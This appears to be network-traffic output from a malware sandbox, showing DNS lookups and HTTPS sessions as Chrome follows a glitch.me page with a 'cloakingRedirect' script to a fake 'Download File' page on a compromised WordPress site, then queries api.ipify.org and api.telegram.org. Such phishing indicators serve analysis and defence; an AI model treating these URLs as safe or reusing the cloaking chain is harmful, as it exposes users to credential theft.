                                        Jan 14, 2025 18:23:32.464255095 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:33.980758905 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:33.980799913 CET44350008142.250.186.164192.168.2.6
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Jan 14, 2025 18:22:24.392714977 CET | 192.168.2.6 | 1.1.1.1 | c23c | (Port unreachable) | Destination Unreachable |
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Jan 14, 2025 18:22:21.853024960 CET | 192.168.2.6 | 1.1.1.1 | 0x309 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:21.853147030 CET | 192.168.2.6 | 1.1.1.1 | 0x8a37 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.355478048 CET | 192.168.2.6 | 1.1.1.1 | 0x7e6f | Standard query (0) | savory-sweet-felidae-psrnd.glitch.me | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.355815887 CET | 192.168.2.6 | 1.1.1.1 | 0xa788 | Standard query (0) | savory-sweet-felidae-psrnd.glitch.me | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:24.229125023 CET | 192.168.2.6 | 1.1.1.1 | 0x3bb8 | Standard query (0) | www.nordicplow.com | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:24.229242086 CET | 192.168.2.6 | 1.1.1.1 | 0xce67 | Standard query (0) | www.nordicplow.com | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:25.156393051 CET | 192.168.2.6 | 1.1.1.1 | 0x9107 | Standard query (0) | upload.wikimedia.org | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:25.156651020 CET | 192.168.2.6 | 1.1.1.1 | 0x9523 | Standard query (0) | upload.wikimedia.org | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:26.393668890 CET | 192.168.2.6 | 1.1.1.1 | 0xd072 | Standard query (0) | upload.wikimedia.org | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:26.394009113 CET | 192.168.2.6 | 1.1.1.1 | 0x5e89 | Standard query (0) | upload.wikimedia.org | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:27.825103045 CET | 192.168.2.6 | 1.1.1.1 | 0x861e | Standard query (0) | www.nordicplow.com | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:27.825556040 CET | 192.168.2.6 | 1.1.1.1 | 0x306 | Standard query (0) | www.nordicplow.com | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:38.661484957 CET | 192.168.2.6 | 1.1.1.1 | 0x3aea | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:38.661658049 CET | 192.168.2.6 | 1.1.1.1 | 0x28f2 | Standard query (0) | api.ipify.org | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.263542891 CET | 192.168.2.6 | 1.1.1.1 | 0xc20e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.263663054 CET | 192.168.2.6 | 1.1.1.1 | 0x12c0 | Standard query (0) | api.telegram.org | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.265769005 CET | 192.168.2.6 | 1.1.1.1 | 0xbbc | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.265917063 CET | 192.168.2.6 | 1.1.1.1 | 0xc186 | Standard query (0) | api.ipify.org | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:40.255341053 CET | 192.168.2.6 | 1.1.1.1 | 0x7ec6 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:40.255486965 CET | 192.168.2.6 | 1.1.1.1 | 0x5f76 | Standard query (0) | api.telegram.org | 65 | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Jan 14, 2025 18:22:21.859777927 CET | 1.1.1.1 | 192.168.2.6 | 0x8a37 | No error (0) | www.google.com | - | - | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:21.860155106 CET | 1.1.1.1 | 192.168.2.6 | 0x309 | No error (0) | www.google.com | - | 142.250.186.164 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 34.233.109.53 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 34.235.224.68 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 34.234.192.54 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 44.194.192.230 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 54.145.102.19 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 44.206.124.177 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 18.215.21.8 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | savory-sweet-felidae-psrnd.glitch.me | - | 34.237.47.184 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:24.242923975 CET | 1.1.1.1 | 192.168.2.6 | 0x3bb8 | No error (0) | www.nordicplow.com | nordicplow.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:24.242923975 CET | 1.1.1.1 | 192.168.2.6 | 0x3bb8 | No error (0) | nordicplow.com | - | 192.124.249.155 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:24.392534971 CET | 1.1.1.1 | 192.168.2.6 | 0xce67 | No error (0) | www.nordicplow.com | nordicplow.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:25.165555000 CET | 1.1.1.1 | 192.168.2.6 | 0x9107 | No error (0) | upload.wikimedia.org | - | 185.15.59.240 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:26.400921106 CET | 1.1.1.1 | 192.168.2.6 | 0xd072 | No error (0) | upload.wikimedia.org | - | 185.15.59.240 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:27.839629889 CET | 1.1.1.1 | 192.168.2.6 | 0x861e | No error (0) | www.nordicplow.com | nordicplow.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:27.839629889 CET | 1.1.1.1 | 192.168.2.6 | 0x861e | No error (0) | nordicplow.com | - | 192.124.249.155 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:27.842057943 CET | 1.1.1.1 | 192.168.2.6 | 0x306 | No error (0) | www.nordicplow.com | nordicplow.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:38.668438911 CET | 1.1.1.1 | 192.168.2.6 | 0x28f2 | No error (0) | api.ipify.org | - | - | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:38.668883085 CET | 1.1.1.1 | 192.168.2.6 | 0x3aea | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:38.668883085 CET | 1.1.1.1 | 192.168.2.6 | 0x3aea | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:38.668883085 CET | 1.1.1.1 | 192.168.2.6 | 0x3aea | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.270199060 CET | 1.1.1.1 | 192.168.2.6 | 0xc20e | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.272507906 CET | 1.1.1.1 | 192.168.2.6 | 0xbbc | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.272507906 CET | 1.1.1.1 | 192.168.2.6 | 0xbbc | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.272507906 CET | 1.1.1.1 | 192.168.2.6 | 0xbbc | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                        Jan 14, 2025 18:22:39.273425102 CET | 1.1.1.1 | 192.168.2.6 | 0xc186 | No error (0) | api.ipify.org | - | - | 65 | IN (0x0001) | false
                                        Jan 14, 2025 18:22:40.262018919 CET | 1.1.1.1 | 192.168.2.6 | 0x7ec6 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                        • savory-sweet-felidae-psrnd.glitch.me
                                        • https:
                                          • www.nordicplow.com
                                          • upload.wikimedia.org
                                          • api.ipify.org
                                          • api.telegram.org
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.6 | 49716 | 34.233.109.53 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:24 UTC | 679 | OUT | GET / HTTP/1.1
                                        Host: savory-sweet-felidae-psrnd.glitch.me
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:24 UTC | 506 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:24 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 1266
                                        Connection: close
                                        x-amz-id-2: cOqOYwsJw5pIaToCWfy92TzalJB7EK3jEiVbVESRNjbkOHKoNcVjCJZWuKUUDkMkn+vZmzSN90o=
                                        x-amz-request-id: V280E9VFQQVQEGZH
                                        last-modified: Tue, 14 Jan 2025 09:35:25 GMT
                                        etag: "548469b1563d7e4026cdb3357654dedf"
                                        x-amz-server-side-encryption: AES256
                                        cache-control: no-cache
                                        x-amz-version-id: ymrDhO0FHD9p_bNXzXBah3tF2KODSzQg
                                        accept-ranges: bytes
                                        server: AmazonS3
                                        2025-01-14 17:22:24 UTC | 1266 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Working...</title> <script type="text/javascript"> function cloakingRedirect() {


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.6 | 49724 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:24 UTC | 731 | OUT | GET /wp-admin/includes/fotex.html HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://savory-sweet-felidae-psrnd.glitch.me/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:25 UTC | 468 | IN | HTTP/1.1 200 OK
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 5875
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Last-Modified: Tue, 14 Jan 2025 14:05:32 GMT
                                        ETag: "2a2003c-16f3-62bab0ddb875b"
                                        Vary: Accept-Encoding
                                        X-Sucuri-Cache: BYPASS
                                        Accept-Ranges: bytes
                                        2025-01-14 17:22:25 UTC | 5875 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Download File</title> <style> body { margin: 0; padding: 0;


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.6 | 49731 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:25 UTC | 623 | OUT | GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:26 UTC | 1080 | IN | HTTP/1.1 200 OK
                                        date: Mon, 13 Jan 2025 22:03:28 GMT
                                        server: ATS/9.2.6
                                        etag: W/363fdd53d34303b727d9dab161b8e88b
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: an1udxuweqh76ugogpdy8qhw9zzoroi
                                        last-modified: Thu, 29 Jul 2021 02:10:50 GMT
                                        vary: Accept-Encoding
                                        age: 69537
                                        x-cache: cp3075 hit, cp3075 hit/464
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 272
                                        connection: close
                                        2025-01-14 17:22:26 UTC | 272 | IN | Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h1


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.6 | 49730 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:25 UTC | 622 | OUT | GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:26 UTC | 1081 | IN | HTTP/1.1 200 OK
                                        date: Tue, 14 Jan 2025 07:47:37 GMT
                                        server: ATS/9.2.6
                                        etag: W/a8feaf8ea80c17228a67dfeb1e251d8f
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: 6m6viw83q9g48berxblqjamcmy7nocl
                                        last-modified: Tue, 02 Aug 2022 23:58:51 GMT
                                        vary: Accept-Encoding
                                        age: 34489
                                        x-cache: cp3075 hit, cp3075 hit/196
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 5094
                                        connection: close
                                        2025-01-14 17:22:26 UTC | 5094 | IN | Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164"> <g transform="translate(53.548057 -183.975276) scale(1.4843)"> <path fill="#ff


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.6 | 49723 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:26 UTC | 620 | OUT | GET /favicon.ico HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/wp-admin/includes/fotex.html
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC | 630 | IN | HTTP/1.1 302 Found
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Link: <https://www.nordicplow.com/wp-json/>; rel="https://api.w.org/"
                                        X-Redirect-By: WordPress
                                        Location: https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png
                                        Vary: Accept-Encoding
                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                        Cache-Control: max-age=315360000
                                        X-Sucuri-Cache: MISS


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.6 | 49740 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:27 UTC | 385 | OUT | GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC | 1080 | IN | HTTP/1.1 200 OK
                                        date: Mon, 13 Jan 2025 22:03:28 GMT
                                        server: ATS/9.2.6
                                        etag: W/363fdd53d34303b727d9dab161b8e88b
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: an1udxuweqh76ugogpdy8qhw9zzoroi
                                        last-modified: Thu, 29 Jul 2021 02:10:50 GMT
                                        vary: Accept-Encoding
                                        age: 69538
                                        x-cache: cp3075 hit, cp3075 hit/465
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 272
                                        connection: close
                                        2025-01-14 17:22:27 UTC | 272 | IN | Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h1


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.6 | 49741 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:27 UTC | 384 | OUT | GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1
                                        Host: upload.wikimedia.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC | 1081 | IN | HTTP/1.1 200 OK
                                        date: Tue, 14 Jan 2025 07:47:37 GMT
                                        server: ATS/9.2.6
                                        etag: W/a8feaf8ea80c17228a67dfeb1e251d8f
                                        content-type: image/svg+xml
                                        x-object-meta-sha1base36: 6m6viw83q9g48berxblqjamcmy7nocl
                                        last-modified: Tue, 02 Aug 2022 23:58:51 GMT
                                        vary: Accept-Encoding
                                        age: 34490
                                        x-cache: cp3075 hit, cp3075 hit/197
                                        x-cache-status: hit-front
                                        server-timing: cache;desc="hit-front", host;desc="cp3075"
                                        strict-transport-security: max-age=106384710; includeSubDomains; preload
                                        report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                        nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                        x-client-ip: 8.46.123.189
                                        x-content-type-options: nosniff
                                        access-control-allow-origin: *
                                        access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                        timing-allow-origin: *
                                        accept-ranges: bytes
                                        content-length: 5094
                                        connection: close
                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164"> <g transform="translate(53.548057 -183.975276) scale(1.4843)"> <path fill="#ff


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.6 | 49748 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:27 UTC | 652 | OUT | GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://www.nordicplow.com/wp-admin/includes/fotex.html
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:27 UTC | 516 | IN | HTTP/1.1 200 OK
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:27 GMT
                                        Content-Type: image/png
                                        Content-Length: 4119
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Last-Modified: Tue, 16 Nov 2021 00:04:01 GMT
                                        ETag: "24e0310-1017-5d0dca9a37e40"
                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                        Cache-Control: max-age=315360000
                                        X-Sucuri-Cache: HIT
                                        Accept-Ranges: bytes


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.6 | 49751 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:28 UTC | 385 | OUT | GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1
                                        Host: www.nordicplow.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:28 UTC | 516 | IN | HTTP/1.1 200 OK
                                        Server: Sucuri/Cloudproxy
                                        Date: Tue, 14 Jan 2025 17:22:28 GMT
                                        Content-Type: image/png
                                        Content-Length: 4119
                                        Connection: close
                                        X-Sucuri-ID: 14005
                                        X-XSS-Protection: 1; mode=block
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: upgrade-insecure-requests;
                                        Last-Modified: Tue, 16 Nov 2021 00:04:01 GMT
